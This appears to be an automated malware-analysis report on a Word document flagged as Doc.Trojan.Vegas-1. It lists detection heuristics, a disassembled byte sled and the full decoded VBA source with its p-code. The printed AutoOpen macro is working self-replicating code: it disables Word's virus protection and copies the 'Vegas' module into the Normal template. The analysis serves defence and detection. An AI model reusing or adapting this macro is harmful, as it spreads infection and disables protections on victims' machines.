MALICIOUS
236
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Microsoft Word document with a high-confidence detection for VBA macros, including an AutoOpen macro and a CreateObject call. The presence of legacy WordBasic auto-exec markers and a NOP-equivalent sled further indicate malicious intent. While the VBA code is truncated, it includes calls to Windows API functions like FatalAppExit and ExitWindows, suggesting an attempt to manipulate the system or terminate processes. The ClamAV detection 'Doc.Trojan.Vegas-1' strongly suggests a known malware family, though specific details are not available in the provided evidence.
Heuristics 7
-
ClamAV: Doc.Trojan.Vegas-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Vegas-1
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Dim fs, d, s Set fs = CreateObject("Scripting.FileSystemObject") Set d = fs.GetDrive(fs.GetDriveName(drvpath)) -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() Application.EnableCancelKey = wdCancelDisabled -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Application.VBE.MainWindow.Visible = False pth = Environ("temp") & "\~WRr000^.tmp" Set dc = NormalTemplate.VBProject.VBComponents -
NOP-equivalent sled detected medium SC_NOP_EQUIV_SLEDLong run of 0x61 bytes
Disassembly
Attempted x86 opcode disassembly00000600 61 popal 00000601 61 popal 00000602 61 popal 00000603 61 popal 00000604 61 popal 00000605 61 popal 00000606 61 popal 00000607 61 popal 00000608 61 popal 00000609 61 popal 0000060A 61 popal 0000060B 61 popal 0000060C 61 popal 0000060D 61 popal 0000060E 61 popal 0000060F 61 popal 00000610 61 popal 00000611 61 popal 00000612 61 popal 00000613 61 popal 00000614 61 popal 00000615 61 popal 00000616 61 popal 00000617 61 popal 00000618 61 popal 00000619 61 popal 0000061A 61 popal 0000061B 61 popal 0000061C 61 popal 0000061D 61 popal 0000061E 61 popal 0000061F 61 popal 00000620 61 popal 00000621 61 popal 00000622 61 popal 00000623 61 popal 00000624 61 popal 00000625 61 popal 00000626 61 popal 00000627 61 popal 00000628 61 popal 00000629 61 popal 0000062A 61 popal 0000062B 61 popal 0000062C 61 popal 0000062D 61 popal 0000062E 61 popal 0000062F 61 popal 00000630 61 popal 00000631 61 popal 00000632 61 popal 00000633 61 popal 00000634 61 popal 00000635 61 popal 00000636 61 popal 00000637 61 popal 00000638 61 popal 00000639 61 popal 0000063A 61 popal 0000063B 61 popal 0000063C 61 popal 0000063D 61 popal 0000063E 61 popal 0000063F 61 popal 00000640 61 popal 00000641 61 popal 00000642 61 popal 00000643 61 popal 00000644 61 popal 00000645 61 popal 00000646 61 popal 00000647 61 popal 00000648 61 popal 00000649 61 popal 0000064A 61 popal 0000064B 61 popal 0000064C 61 popal 0000064D 61 popal 0000064E 61 popal 0000064F 61 popal 00000650 61 popal 00000651 61 popal 00000652 61 popal 00000653 61 popal 00000654 61 popal 00000655 61 popal 00000656 61 popal 00000657 61 popal 00000658 61 popal 00000659 61 popal 0000065A 61 popal 0000065B 61 popal 0000065C 61 popal 0000065D 61 popal 0000065E 61 popal 0000065F 61 popal
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14015 bytes |
SHA-256: 176f77270f9f69b4d44cf7faef67ed3b0633ddec1f62f74bd2a588133b1d53f9 |
|||
|
Detection
ClamAV:
Doc.Trojan.Vegas-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub test()
MsgBox ("Test")
End Sub
Attribute VB_Name = "vegas"
Sub test2()
MsgBox ("Test2")
End Sub
Attribute VB_Name = "Vegas1"
Option Explicit
Const NStat = 1
Const VStat = 1
Public Declare Sub FatalAppExit Lib "kernel32" Alias "FatalAppExitA" (ByVal uAction As Long, ByVal lpMessageText As String)
Public Declare Function ExitWindows Lib "user32" (ByVal dwReserved As Long, ByVal uReturnCode As Long) As Long
Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Sub ShowFreeSpace(drvpath)
Dim fs, d, s
Set fs = CreateObject("Scripting.FileSystemObject")
Set d = fs.GetDrive(fs.GetDriveName(drvpath))
s = "Drive " & UCase(drvpath) & " - "
s = s & d.VolumeName & vbCrLf
s = s & "Free Space: " & FormatNumber(d.FreeSpace / 1024, 0)
s = s & " Kbytes"
MsgBox s
End Sub
Sub ShowFolderList()
Dim fs, f, f1, fc, s, i, folderspec
folderspec = "D:\"
Set fs = CreateObject("Scripting.FileSystemObject")
Set f = fs.GetFolder(folderspec)
Set fc = f.subfolders
For i = 1 To fc.Count
s = s & fc.Item(1)
s = s & vbCrLf
Next i
MsgBox s
End Sub
Sub ShowFileList()
Dim fs, f, f1, fc, s, folderspec
Set fs = CreateObject("Scripting.FileSystemObject")
folderspec = "D:\"
Set f = fs.GetFolder(folderspec)
Set fc = f.Files
For Each f1 In fc
s = s & f1.Name
s = s & vbCrLf
Next
MsgBox s
End Sub
Sub ShowDriveType()
Dim fs, d, dd, dc, n, s, t
Dim fe, drvpath
drvpath = "d:\"
Set fs = CreateObject("Scripting.FileSystemObject")
'Set d = fs.GetDrive(drvpath)
Set dc = fs.Drives
For Each d In dc
s = s & d.DriveLetter & " - "
Select Case d.DriveType
Case 0: t = "Unknown"
Case 1: t = "Removable"
Case 2: t = "Fixed"
Case 3: t = "Network"
Case 4: t = "CD-ROM"
Case 5: t = "RAM Disk"
End Select
If d.DriveType = 1 Then
n = d.ShareName
Else
n = d.VolumeName
End If
s = s & "Drive " & d.DriveLetter & ": - " & t & " - " & n & vbCrLf
Next
MsgBox s
End Sub
Sub qw()
Call ShowDriveType("d:\")
End Sub
Sub ShowFileSize()
Dim fs, f, s, filespec
Set fs = CreateObject("Scripting.FileSystemObject")
filespec = "d:\pass.exe"
Set f = fs.GetFile(filespec)
s = UCase(f.Name) & " is a " & f.Type
MsgBox s, 0, "File Size Info"
End Sub
Sub AutoOpen()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
Dim pth As String, i As Byte, dc As Object
Dim NInst As Boolean, AInst As Boolean
On Error Resume Next
Application.VBE.MainWindow.Visible = False
pth = Environ("temp") & "\~WRr000^.tmp"
Set dc = NormalTemplate.VBProject.VBComponents
For i = 1 To dc.Count
If dc(i).Name = "Vegas" Then
NInst = 1
dc(i).Export pth
End If
Next i
Set dc = ActiveDocument.VBProject.VBComponents
For i = 1 To dc.Count
If dc(i).Name = "Vegas" Then
AInst = 1
dc(i).Export pth
End If
Next i
If AInst = True And NInst = False Then Set dc = NormalTemplate
If AInst = False And NInst = True Then Set dc = ActiveDocument
If AInst = False Or NInst = False Then
dc.VBProject.VBComponents.Import pth
ActiveDocument.Save
If Mid(ActiveDocument.FullName, 2, 1) = ":" Then dc.Save
Kill pth
End If
End Sub
Sub AutoExec()
End Sub
Sub Fileprint()
Dialogs(wdDialogFilePrint).Show
End Sub
Sub FileSave()
ActiveDocument.Save
End Sub
Sub FileSaveAs()
Dialogs(wdDialogFileSaveAs).Show
End Sub
' Processing file: /tmp/qstore_u1b_ice3
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1443 bytes
' Line #0:
' FuncDefn (Sub test())
' Line #1:
' LitStr 0x0004 "Test"
' Paren
' ArgsCall MsgBox 0x0001
' Line #2:
' EndSub
' Macros/VBA/vegas - 918 bytes
' Line #0:
' FuncDefn (Sub test2())
' Line #1:
' LitStr 0x0005 "Test2"
' Paren
' ArgsCall MsgBox 0x0001
' Line #2:
' EndSub
' Line #3:
' Macros/VBA/Vegas1 - 8618 bytes
' Line #0:
' Option (Explicit)
' Line #1:
' Dim (Const)
' LitDI2 0x0001
' VarDefn NStat
' Line #2:
' Dim (Const)
' LitDI2 0x0001
' VarDefn VStat
' Line #3:
' FuncDefn (Public Declare Sub FatalAppExit Lib "kernel32" (ByVal uAction As Long, ByVal lpMessageText As String))
' Line #4:
' FuncDefn (Public Declare Function ExitWindows Lib "user32" (ByVal dwReserved As Long, ByVal uReturnCode As Long) As Long)
' Line #5:
' FuncDefn (Declare Function GetSystemDirectory Lib "kernel32" (ByVal lpBuffer As String, ByVal nSize As Long) As Long)
' Line #6:
' Line #7:
' FuncDefn (Sub ShowFreeSpace(drvpath))
' Line #8:
' Dim
' VarDefn fs
' VarDefn d
' VarDefn s
' Line #9:
' SetStmt
' LitStr 0x001A "Scripting.FileSystemObject"
' ArgsLd CreateObject 0x0001
' Set fs
' Line #10:
' SetStmt
' Ld drvpath
' Ld fs
' ArgsMemLd GetDriveName 0x0001
' Ld fs
' ArgsMemLd GetDrive 0x0001
' Set d
' Line #11:
' LitStr 0x0006 "Drive "
' Ld drvpath
' ArgsLd UCase 0x0001
' Concat
' LitStr 0x0003 " - "
' Concat
' St s
' Line #12:
' Ld s
' Ld d
' MemLd VolumeName
' Concat
' Ld vbCrLf
' Concat
' St s
' Line #13:
' Ld s
' LitStr 0x000C "Free Space: "
' Concat
' Ld d
' MemLd FreeSpace
' LitDI2 0x0400
' Div
' LitDI2 0x0000
' ArgsLd FormatNumber 0x0002
' Concat
' St s
' Line #14:
' Ld s
' LitStr 0x0007 " Kbytes"
' Concat
' St s
' Line #15:
' Ld s
' ArgsCall MsgBox 0x0001
' Line #16:
' EndSub
' Line #17:
' Line #18:
' Line #19:
' Line #20:
' Line #21:
' FuncDefn (Sub ShowFolderList())
' Line #22:
' Dim
' VarDefn fs
' VarDefn False
' VarDefn f1
' VarDefn fc
' VarDefn s
' VarDefn i
' VarDefn folderspec
' Line #23:
' LitStr 0x0003 "D:\"
' St folderspec
' Line #24:
' SetStmt
' LitStr 0x001A "Scripting.FileSystemObject"
' ArgsLd CreateObject 0x0001
' Set fs
' Line #25:
' SetStmt
' Ld folderspec
' Ld fs
' ArgsMemLd GetFolder 0x0001
' Set False
' Line #26:
' SetStmt
' Ld False
' MemLd subfolders
' Set fc
' Line #27:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' Ld fc
' MemLd Count
' For
' Line #28:
' Ld s
' LitDI2 0x0001
' Ld fc
' ArgsMemLd Item 0x0001
' Concat
' St s
' Line #29:
' Ld s
' Ld vbCrLf
' Concat
' St s
' Line #30:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #31:
' Ld s
' ArgsCall MsgBox 0x0001
' Line #32:
' EndSub
' Line #33:
' Line #34:
' FuncDefn (Sub ShowFileList())
' Line #35:
' Dim
' VarDefn fs
' VarDefn False
' VarDefn f1
' VarDefn fc
' VarDefn s
' VarDefn folderspec
' Line #36:
' SetStmt
' LitStr 0x001A "Scripting.FileSystemObject"
' ArgsLd CreateObject 0x0001
' Set fs
' Line #37:
' LitStr 0x0003 "D:\"
' St folderspec
' Line #38:
' SetStmt
' Ld folderspec
' Ld fs
' ArgsMemLd GetFolder 0x0001
' Set False
' Line #39:
' SetStmt
' Ld False
' MemLd Files
' Set fc
' Line #40:
' StartForVariable
' Ld f1
' EndForVariable
' Ld fc
' ForEach
' Line #41:
' Ld s
' Ld f1
' MemLd New
' Concat
' St s
' Line #42:
' Ld s
' Ld vbCrLf
' Concat
' St s
' Line #43:
' StartForVariable
' Next
' Line #44:
' Ld s
' ArgsCall MsgBox 0x0001
' Line #45:
' EndSub
' Line #46:
' Line #47:
' Line #48:
' FuncDefn (Sub ShowDriveType())
' Line #49:
' Dim
' VarDefn fs
' VarDefn d
' VarDefn dd
' VarDefn dc
' VarDefn n
' VarDefn s
' VarDefn t
' Line #50:
' Dim
' VarDefn fe
' VarDefn drvpath
' Line #51:
' LitStr 0x0003 "d:\"
' St drvpath
' Line #52:
' SetStmt
' LitStr 0x001A "Scripting.FileSystemObject"
' ArgsLd CreateObject 0x0001
' Set fs
' Line #53:
' QuoteRem 0x0004 0x001C "Set d = fs.GetDrive(drvpath)"
' Line #54:
' SetStmt
' Ld fs
' MemLd Drives
' Set dc
' Line #55:
' StartForVariable
' Ld d
' EndForVariable
' Ld dc
' ForEach
' Line #56:
' Ld s
' Ld d
' MemLd DriveLetter
' Concat
' LitStr 0x0003 " - "
' Concat
' St s
' Line #57:
' Ld d
' MemLd DriveType
' SelectCase
' Line #58:
' LitDI2 0x0000
' Case
' CaseDone
' BoS 0x0000
' LitStr 0x0007 "Unknown"
' St t
' Line #59:
' LitDI2 0x0001
' Case
' CaseDone
' BoS 0x0000
' LitStr 0x0009 "Removable"
' St t
' Line #60:
' LitDI2 0x0002
' Case
' CaseDone
' BoS 0x0000
' LitStr 0x0005 "Fixed"
' St t
' Line #61:
' LitDI2 0x0003
' Case
' CaseDone
' BoS 0x0000
' LitStr 0x0007 "Network"
' St t
' Line #62:
' LitDI2 0x0004
' Case
' CaseDone
' BoS 0x0000
' LitStr 0x0006 "CD-ROM"
' St t
' Line #63:
' LitDI2 0x0005
' Case
' CaseDone
' BoS 0x0000
' LitStr 0x0008 "RAM Disk"
' St t
' Line #64:
' EndSelect
' Line #65:
' Ld d
' MemLd DriveType
' LitDI2 0x0001
' Eq
' IfBlock
' Line #66:
' Ld d
' MemLd ShareName
' St n
' Line #67:
' ElseBlock
' Line #68:
' Ld d
' MemLd VolumeName
' St n
' Line #69:
' EndIfBlock
' Line #70:
' Ld s
' LitStr 0x0006 "Drive "
' Concat
' Ld d
' MemLd DriveLetter
' Concat
' LitStr 0x0004 ": - "
' Concat
' Ld t
' Concat
' LitStr 0x0003 " - "
' Concat
' Ld n
' Concat
' Ld vbCrLf
' Concat
' St s
' Line #71:
' StartForVariable
' Next
' Line #72:
' Ld s
' ArgsCall MsgBox 0x0001
' Line #73:
' EndSub
' Line #74:
' Line #75:
' FuncDefn (Sub qw())
' Line #76:
' LitStr 0x0003 "d:\"
' ArgsCall (Call) ShowDriveType 0x0001
' Line #77:
' EndSub
' Line #78:
' Line #79:
' FuncDefn (Sub ShowFileSize())
' Line #80:
' Dim
' VarDefn fs
' VarDefn False
' VarDefn s
' VarDefn filespec
' Line #81:
' SetStmt
' LitStr 0x001A "Scripting.FileSystemObject"
' ArgsLd CreateObject 0x0001
' Set fs
' Line #82:
' LitStr 0x000B "d:\pass.exe"
' St filespec
' Line #83:
' SetStmt
' Ld filespec
' Ld fs
' ArgsMemLd GetFile 0x0001
' Set False
' Line #84:
' Ld False
' MemLd New
' ArgsLd UCase 0x0001
' LitStr 0x0006 " is a "
' Concat
' Ld False
' MemLd TypeOf
' Concat
' St s
' Line #85:
' Ld s
' LitDI2 0x0000
' LitStr 0x000E "File Size Info"
' ArgsCall MsgBox 0x0003
' Line #86:
' EndSub
' Line #87:
' Line #88:
' Line #89:
' FuncDefn (Sub AutoOpen())
' Line #90:
' Ld wdCancelDisabled
' Ld Application
' MemSt EnableCancelKey
' Line #91:
' LitDI2 0x0000
' Ld WordBasic
' ArgsMemCall DisableAutoMacros 0x0001
' Line #92:
' LitDI2 0x0000
' Ld Options
' MemSt VirusProtection
' Line #93:
' LitDI2 0x0000
' Ld Options
' MemSt SaveNormalPrompt
' Line #94:
' Dim
' VarDefn pth (As String)
' VarDefn i (As Byte)
' VarDefn dc (As Object)
' Line #95:
' Dim
' VarDefn NInst (As Boolean)
' VarDefn AInst (As Boolean)
' Line #96:
' OnError (Resume Next)
' Line #97:
' LitVarSpecial (False)
' Ld Application
' MemLd VBE
' MemLd MainWindow
' MemSt Visible
' Line #98:
' LitStr 0x0004 "temp"
' ArgsLd Environ 0x0001
' LitStr 0x000D "\~WRr000^.tmp"
' Concat
' St pth
' Line #99:
' SetStmt
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' Set dc
' Line #100:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' Ld dc
' MemLd Count
' For
' Line #101:
' Ld i
' ArgsLd dc 0x0001
' MemLd New
' LitStr 0x0005 "Vegas"
' Eq
' IfBlock
' Line #102:
' LitDI2 0x0001
' St NInst
' Line #103:
' Ld pth
' Ld i
' ArgsLd dc 0x0001
' ArgsMemCall Export 0x0001
' Line #104:
' EndIfBlock
' Line #105:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #106:
' SetStmt
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' Set dc
' Line #107:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' Ld dc
' MemLd Count
' For
' Line #108:
' Ld i
' ArgsLd dc 0x0001
' MemLd New
' LitStr 0x0005 "Vegas"
' Eq
' IfBlock
' Line #109:
' LitDI2 0x0001
' St AInst
' Line #110:
' Ld pth
' Ld i
' ArgsLd dc 0x0001
' ArgsMemCall Export 0x0001
' Line #111:
' EndIfBlock
' Line #112:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #113:
' Ld AInst
' LitVarSpecial (True)
' Eq
' Ld NInst
' LitVarSpecial (False)
' Eq
' And
' If
' BoSImplicit
' SetStmt
' Ld NormalTemplate
' Set dc
' EndIf
' Line #114:
' Ld AInst
' LitVarSpecial (False)
' Eq
' Ld NInst
' LitVarSpecial (True)
' Eq
' And
' If
' BoSImplicit
' SetStmt
' Ld ActiveDocument
' Set dc
' EndIf
' Line #115:
' Ld AInst
' LitVarSpecial (False)
' Eq
' Ld NInst
' LitVarSpecial (False)
' Eq
' Or
' IfBlock
' Line #116:
' Ld pth
' Ld dc
' MemLd VBProject
' MemLd VBComponents
' ArgsMemCall Import 0x0001
' Line #117:
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' Line #118:
' Ld ActiveDocument
' MemLd FullName
' LitDI2 0x0002
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' LitStr 0x0001 ":"
' Eq
' If
' BoSImplicit
' Ld dc
' ArgsMemCall Save 0x0000
' EndIf
' Line #119:
' Ld pth
' ArgsCall Kill 0x0001
' Line #120:
' EndIfBlock
' Line #121:
' EndSub
' Line #122:
' Line #123:
' FuncDefn (Sub AutoExec())
' Line #124:
' EndSub
' Line #125:
' Line #126:
' FuncDefn (Sub Fileprint())
' Line #127:
' Ld wdDialogFilePrint
' ArgsLd Dialogs 0x0001
' ArgsMemCall Show 0x0000
' Line #128:
' EndSub
' Line #129:
' FuncDefn (Sub FileSave())
' Line #130:
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' Line #131:
' EndSub
' Line #132:
' FuncDefn (Sub FileSaveAs())
' Line #133:
' Ld wdDialogFileSaveAs
' ArgsLd Dialogs 0x0001
' ArgsMemCall Show 0x0000
' Line #134:
' EndSub
' Line #135:
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.